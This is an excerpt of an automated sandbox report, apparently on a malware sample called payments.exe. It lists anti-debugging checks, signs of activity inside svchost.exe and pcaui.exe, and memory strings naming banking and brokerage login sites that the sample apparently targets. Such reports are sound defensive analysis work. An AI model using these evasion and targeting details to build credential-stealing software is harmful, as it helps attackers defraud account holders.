                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CE1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00CE1B2F
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CE1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00CE1C8A
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CE1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00CE1F94
                Source: C:\Windows\SysWOW64\pcaui.exe Code function: 4_2_026BC920 FindFirstFileW,FindNextFileW,FindClose, 4_2_026BC920
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00CADDC0
                Source: 72Z53078.4.dr Binary or memory string: dev.azure.comVMware20,11696497155j
                Source: 72Z53078.4.dr Binary or memory string: global block list test formVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 72Z53078.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 72Z53078.4.dr Binary or memory string: tasks.office.comVMware20,11696497155o
                Source: 72Z53078.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3795525276.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1762497611.0000022F2FBEC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 72Z53078.4.dr Binary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 72Z53078.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 72Z53078.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 72Z53078.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 72Z53078.4.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: AMC password management pageVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 72Z53078.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 72Z53078.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 72Z53078.4.dr Binary or memory string: discord.comVMware20,11696497155f
                Source: 72Z53078.4.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 72Z53078.4.dr Binary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 72Z53078.4.dr Binary or memory string: outlook.office.comVMware20,11696497155s
                Source: 72Z53078.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: 72Z53078.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: 72Z53078.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\pcaui.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417983 LdrLoadDll, 2_2_00417983
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CE6AAF BlockInput, 0_2_00CE6AAF
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00C93D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00C93D19
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CC3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW, 0_2_00CC3920
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_00CAE01E LoadLibraryA,GetProcAddress, 0_2_00CAE01E
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_010AE1E0 mov eax, dword ptr fs:[00000030h] 0_2_010AE1E0
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_010AE240 mov eax, dword ptr fs:[00000030h] 0_2_010AE240
                Source: C:\Users\user\Desktop\payments.exe Code function: 0_2_010ACBB0 mov eax, dword ptr fs:[00000030h] 0_2_010ACBB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D437C mov eax, dword ptr fs:[00000030h] 2_2_037D437C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B035C mov eax, dword ptr fs:[00000030h] 2_2_037B035C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037FA352 mov eax, dword ptr fs:[00000030h] 2_2_037FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D8350 mov ecx, dword ptr fs:[00000030h] 2_2_037D8350
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B2349 mov eax, dword ptr fs:[00000030h] 2_2_037B2349
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372C310 mov ecx, dword ptr fs:[00000030h] 2_2_0372C310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03750310 mov ecx, dword ptr fs:[00000030h] 2_2_03750310
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0376A30B mov eax, dword ptr fs:[00000030h] 2_2_0376A30B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0374E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0374E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037663FF mov eax, dword ptr fs:[00000030h] 2_2_037663FF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037403E9 mov eax, dword ptr fs:[00000030h] 2_2_037403E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov ecx, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03808324 mov eax, dword ptr fs:[00000030h] 2_2_03808324
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037DE3DB mov eax, dword ptr fs:[00000030h] 2_2_037DE3DB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h] 2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037D43D4 mov eax, dword ptr fs:[00000030h] 2_2_037D43D4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037EC3CD mov eax, dword ptr fs:[00000030h] 2_2_037EC3CD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0373A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0373A3C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037383C0 mov eax, dword ptr fs:[00000030h] 2_2_037383C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037B63C0 mov eax, dword ptr fs:[00000030h] 2_2_037B63C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0380634F mov eax, dword ptr fs:[00000030h] 2_2_0380634F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h] 2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h] 2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03728397 mov eax, dword ptr fs:[00000030h] 2_2_03728397
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h] 2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h] 2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0372E388 mov eax, dword ptr fs:[00000030h] 2_2_0372E388
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h] 2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0375438F mov eax, dword ptr fs:[00000030h] 2_2_0375438F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_037E0274 mov eax, dword ptr fs:[00000030h] 2_2_037E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03734260 mov eax, dword ptr fs:[00000030h]2_2_03734260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372826B mov eax, dword ptr fs:[00000030h]2_2_0372826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A250 mov eax, dword ptr fs:[00000030h]2_2_0372A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736259 mov eax, dword ptr fs:[00000030h]2_2_03736259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EA250 mov eax, dword ptr fs:[00000030h]2_2_037EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov eax, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B8243 mov ecx, dword ptr fs:[00000030h]2_2_037B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372823B mov eax, dword ptr fs:[00000030h]2_2_0372823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038062D6 mov eax, dword ptr fs:[00000030h]2_2_038062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402E1 mov eax, dword ptr fs:[00000030h]2_2_037402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373A2C3 mov eax, dword ptr fs:[00000030h]2_2_0373A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037402A0 mov eax, dword ptr fs:[00000030h]2_2_037402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov ecx, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C62A0 mov eax, dword ptr fs:[00000030h]2_2_037C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0380625D mov eax, dword ptr fs:[00000030h]2_2_0380625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376E284 mov eax, dword ptr fs:[00000030h]2_2_0376E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B0283 mov eax, dword ptr fs:[00000030h]2_2_037B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C156 mov eax, dword ptr fs:[00000030h]2_2_0372C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C8158 mov eax, dword ptr fs:[00000030h]2_2_037C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03736154 mov eax, dword ptr fs:[00000030h]2_2_03736154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov ecx, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C4144 mov eax, dword ptr fs:[00000030h]2_2_037C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760124 mov eax, dword ptr fs:[00000030h]2_2_03760124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov ecx, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DA118 mov eax, dword ptr fs:[00000030h]2_2_037DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038061E5 mov eax, dword ptr fs:[00000030h]2_2_038061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F0115 mov eax, dword ptr fs:[00000030h]2_2_037F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
